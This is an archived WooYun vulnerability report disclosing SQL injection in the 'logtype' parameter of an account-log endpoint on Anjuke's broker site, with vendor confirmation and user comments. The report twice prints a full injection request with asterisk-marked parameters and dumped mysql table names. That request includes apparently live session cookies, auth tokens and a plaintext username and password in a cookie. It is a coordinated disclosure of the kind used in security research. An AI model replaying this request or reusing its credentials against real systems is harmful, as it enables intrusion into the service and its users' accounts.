当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147950

漏洞标题:安居客某重要站点存在SQL注射

相关厂商:安居客

漏洞作者: 沦沦

提交时间:2015-10-20 09:33

修复时间:2015-12-04 10:10

公开时间:2015-12-04 10:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

RT

详细说明:

POST /ajkbroker/combo/account/accountlog/ HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/ajkbroker/combo/account/accountlog
Cookie: sessid=0D0EAA87-50D7-B260-1C7A-0B8B4B83042C; aQQ_ajkguid=26548930-F7AA-051F-9798-4D2B041ADD03; lps=http%3A%2F%2Fqingdao.zu.anjuke.com%2F%3Ffrom%3Dganji_pc_list_tab%7Chttp%3A%2F%2Fqd.ganji.com%2Ffang1%2Fa2%2F; ctid=15; twe=2; __xsptplus8=8.1.1445301187.1445302691.27%233%7Cqd.ganji.com%7C%7C%7C%7C%23%23vOb9WrRHO4vxZZSk7-3LL8MimjbyBQXb%23; als=0; ajk_member_captcha=94d9e25669d24705d9e26e19445f3552; _ga=GA1.2.2099664147.1445301245; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445301246; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445302655; lui=261923%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dchenqiang%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_hzweb_uid=261923; jp_auth_info_new=v%2F4swQte7PeQh9FKGlERi%2BMDuFMvYBfHyAgjInnzlw2B3w; NewGuide=11171%405%3AId%26304800%2CBI%2611171%2CGT%265%2CGS%261%3B6581%405%3AId%26302174%2CBI%266581%2CGT%265%2CGS%261%7C1%3AId%26273311%2CBI%266581%2CGT%261%2CGS%261%3B66325%405%3AId%26335264%2CBI%2666325%2CGT%265%2CGS%261%3B74884%405%3AId%26340171%2CBI%2674884%2CGT%265%2CGS%261; ckimarkednum_343179=0; isp=true; PHPSESSID=5m5js7jmdr6lame8rfrjcd42t0; tuangou_list_ids=1%3A1; _gat=1; aQQ_modbbsadminauthinfos=tvlwxQ5W7P7Zk4ULWAtqmd0Ztkc%2FL0if9VhwcC64wRbk2CJci5gtTw; aQQ_Memberauthinfos=tKp6xg9e7aLZk4ULWAtqmd0Ztkc%2FL0if9VRsUSv%2FzATEqxpRiJkvT7jxCUzq; aQQ_haozuusername=%E7%8E%8B%E7%8E%89%E6%A2%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_Brokerauthinfos=svx4kFsCvvXZloQFXwlW541E5Ax6cRzDyQQgGHz%2BmHCClh0uiN1WOYHwNHHtRIUYdpEe0PsBZiU0fa27aAO6YP98kg; jp_member_id=1055754; jp_auth_info=5ec86848bee10868fbd41935e3db230c; usertype=2; aQQ_ajkauthinfos=4%2F5wlVoC76fZk4ULWAtqttVAkW0wS0nEuklMIiX7zGvh0iJWtJwUTrz1NXboRYEbeqka7%2F89biM0fa2GagSyavxElQuchKw; ajk_member_name=wangyumei; ckimarkednum_261923=0; ajk_member_id=261923
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
logtype=*&ff=2015-09-21*&f=&tt=2015-10-20*&t=*


logtype参数没进行过滤

1.png


2.jpg


3.jpg


4.png


Database: mysql
[28 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+

漏洞证明:

POST /ajkbroker/combo/account/accountlog/ HTTP/1.1
Host: my.anjuke.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.anjuke.com/ajkbroker/combo/account/accountlog
Cookie: sessid=0D0EAA87-50D7-B260-1C7A-0B8B4B83042C; aQQ_ajkguid=26548930-F7AA-051F-9798-4D2B041ADD03; lps=http%3A%2F%2Fqingdao.zu.anjuke.com%2F%3Ffrom%3Dganji_pc_list_tab%7Chttp%3A%2F%2Fqd.ganji.com%2Ffang1%2Fa2%2F; ctid=15; twe=2; __xsptplus8=8.1.1445301187.1445302691.27%233%7Cqd.ganji.com%7C%7C%7C%7C%23%23vOb9WrRHO4vxZZSk7-3LL8MimjbyBQXb%23; als=0; ajk_member_captcha=94d9e25669d24705d9e26e19445f3552; _ga=GA1.2.2099664147.1445301245; Hm_lvt_c5899c8768ebee272710c9c5f365a6d8=1445301246; Hm_lpvt_c5899c8768ebee272710c9c5f365a6d8=1445302655; lui=261923%3A2; history=%2Fapi%2Flogin%2Fsubmit%3Fusername%3Dchenqiang%26password%3D123456%26remember%3Dtrue%26callback%3Dwindow.user.callbackDetail; UserType=2; me=1; aQQ_hzweb_uid=261923; jp_auth_info_new=v%2F4swQte7PeQh9FKGlERi%2BMDuFMvYBfHyAgjInnzlw2B3w; NewGuide=11171%405%3AId%26304800%2CBI%2611171%2CGT%265%2CGS%261%3B6581%405%3AId%26302174%2CBI%266581%2CGT%265%2CGS%261%7C1%3AId%26273311%2CBI%266581%2CGT%261%2CGS%261%3B66325%405%3AId%26335264%2CBI%2666325%2CGT%265%2CGS%261%3B74884%405%3AId%26340171%2CBI%2674884%2CGT%265%2CGS%261; ckimarkednum_343179=0; isp=true; PHPSESSID=5m5js7jmdr6lame8rfrjcd42t0; tuangou_list_ids=1%3A1; _gat=1; aQQ_modbbsadminauthinfos=tvlwxQ5W7P7Zk4ULWAtqmd0Ztkc%2FL0if9VhwcC64wRbk2CJci5gtTw; aQQ_Memberauthinfos=tKp6xg9e7aLZk4ULWAtqmd0Ztkc%2FL0if9VRsUSv%2FzATEqxpRiJkvT7jxCUzq; aQQ_haozuusername=%E7%8E%8B%E7%8E%89%E6%A2%85%7Cbroker%7Chttp%3A%2F%2Fmy.anjuke.com%2Fmy%2Fhome%2F%7Chttp%3A%2F%2Fagent.anjuke.com%2Fmy%2Flogout%2F; aQQ_Brokerauthinfos=svx4kFsCvvXZloQFXwlW541E5Ax6cRzDyQQgGHz%2BmHCClh0uiN1WOYHwNHHtRIUYdpEe0PsBZiU0fa27aAO6YP98kg; jp_member_id=1055754; jp_auth_info=5ec86848bee10868fbd41935e3db230c; usertype=2; aQQ_ajkauthinfos=4%2F5wlVoC76fZk4ULWAtqttVAkW0wS0nEuklMIiX7zGvh0iJWtJwUTrz1NXboRYEbeqka7%2F89biM0fa2GagSyavxElQuchKw; ajk_member_name=wangyumei; ckimarkednum_261923=0; ajk_member_id=261923
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
logtype=*&ff=2015-09-21*&f=&tt=2015-10-20*&t=*


logtype参数没进行过滤

1.png


2.jpg


3.jpg


4.png


Database: mysql
[28 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+

修复方案:

过滤

版权声明:转载请注明来源 沦沦@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-10-20 10:08

厂商回复:

感谢对安居客的支持!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-20 10:15 | 安居客(乌云厂商)

    你好!@沦沦,能否加下QQ 786023382 细聊!

  2. 2015-10-20 10:22 | 紫霞仙子 ( 普通白帽子 | Rank:2107 漏洞数:294 | 天天向上 !!!)

    这是要干什么?欺负我加沦沦么

  3. 2015-10-20 10:24 | 沦沦 ( 普通白帽子 | Rank:586 漏洞数:138 | 爱老婆,爱生活)

    @紫霞仙子 肿么办:)

  4. 2015-10-20 10:24 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1483 漏洞数:189 | 没有最专业的农民,只有更努力地耕耘..........)

    @紫霞仙子 放心,只是送个mac而已。

  5. 2015-10-20 10:38 | king7 ( 普通白帽子 | Rank:645 漏洞数:113 | 收WB~~1:7手续费协商,个位数到三位数量都...)

    这我就不愿意了